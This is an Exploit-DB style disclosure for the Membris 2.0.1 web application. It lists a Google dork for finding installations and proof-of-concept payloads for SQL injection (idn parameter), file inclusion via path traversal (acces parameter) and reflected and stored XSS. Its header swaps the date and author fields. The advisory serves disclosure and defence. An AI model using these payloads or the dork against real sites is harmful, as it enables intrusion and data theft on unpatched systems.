Membris v 2.0.1 Sql XSS & File Disclosure Vulnerabilities

vendor:

Membris

by:

Dr.abolalh

5.5

CVSS

MEDIUM

SQL Injection, Cross-Site Scripting (XSS), File Disclosure

89, 79

CWE

Product Name: Membris

Affected Version From: 2.0.1

Affected Version To: 2.0.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2012

Membris v 2.0.1 Sql XSS & File Disclosure Vulnerabilities

The Membris v 2.0.1 application is vulnerable to SQL Injection, XSS, and File Disclosure vulnerabilities. The SQL Injection vulnerability can be exploited through the 'voir-actualites.php' page by manipulating the 'idn' parameter. The XSS vulnerability can be exploited through the 'search.php' page by manipulating the 'req' parameter. The File Disclosure vulnerability can be exploited through the 'admin/actions-plugin.php' page by manipulating the 'acces' parameter.

Mitigation:

The vendor has not provided a patch for these vulnerabilities. To mitigate the risk, it is recommended to update to a newer version of the application or use a different software.

Source

Exploit-DB raw data:

###################################
# Exploit:Membris v 2.0.1 Sql \ XSS & File Disclosure Vulnerabilities
# Google Dork: Powered by Membris v 2.0.1
# Date: Dr.abolalh
# Author:01/06/2012
# E-Mail: xa3@hotmail.com
# Software Link: http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
# Version: Membris v 2.0.1
###################################

# Exploit-DB Note:
# Application also suffers from
# stored XSS in the messaging system.
# Insert <script>alert('xss');</script>
# in the message body.



SQL:
voir-actualites.php

Exploit:
voir-actualites.php?idn=1 '

+-----------------------------------------------------------+

File Inclusion


include ("../plugins/" . $_GET['acces'] . "/fonctions.php");

Exploit:
admin/actions-plugin.php�acces=../index.php

+-----------------------------------------------------------+

XSS
search.php

Exploit:
search.php?req= XSS

search.php?req='--></style></script><script>alert(0x0002BC)</script>
+-----------------------------------------------------------+

#+--------------------------------------------------+#
#[�] Greetz to : sec4ever                                #
#---------------------------------------------------+#